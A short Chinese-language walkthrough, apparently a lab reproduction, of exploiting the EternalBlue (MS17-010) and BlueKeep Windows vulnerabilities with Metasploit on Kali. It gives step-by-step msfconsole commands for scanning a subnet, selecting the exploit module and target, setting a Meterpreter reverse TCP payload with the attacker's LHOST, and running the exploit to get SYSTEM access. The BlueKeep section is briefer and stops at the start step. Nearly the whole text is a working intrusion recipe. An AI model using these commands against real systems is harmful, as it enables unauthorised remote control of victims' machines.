永恒之蓝
主机:kali
工具:msf
版本:6.1.12
1.启用msf
msfconsole
2.搜索漏洞编号
search ms17-010
![]()
3.选择
use 3 (扫描选择3)
4.查看选项
show options 查看配置
5.进行配置
set RHOSTS 192.168.40.0/24 指定扫描范围 set THREADS 50 指定线程 run 开始
6. 开始扫描
最左侧显示[-]是不可达到的 最左侧显示[*]是分段 最左侧显示[+]是可以操作的
7.搜索漏洞编号
search ms17-010
8.选择模块
use 0 (攻击模块)
9选择目标
show targets
set target 1
10.选择目标IP
set RHOSTS [ip]
11.设置palyoad
set payload windows/x64/meterpreter/reverse_tcp
12.设置本机地址
set LHOST [ip]
13.检测配置
14.开始
exploit
15.查看&提权
看到直接就是system,无需提权。
Blue-Keep
1.复现这个漏洞需要关闭一个服务,且要开启3389服务。
将此服务停止。
2.搜索漏洞
search bluekeep
3.选择模块
use 1
4.更改配置
这里修改配置于上面一致,不再赘述。
在修改payload时注意,选择第五个
这里需要根据你的VMware来修改。
5.开始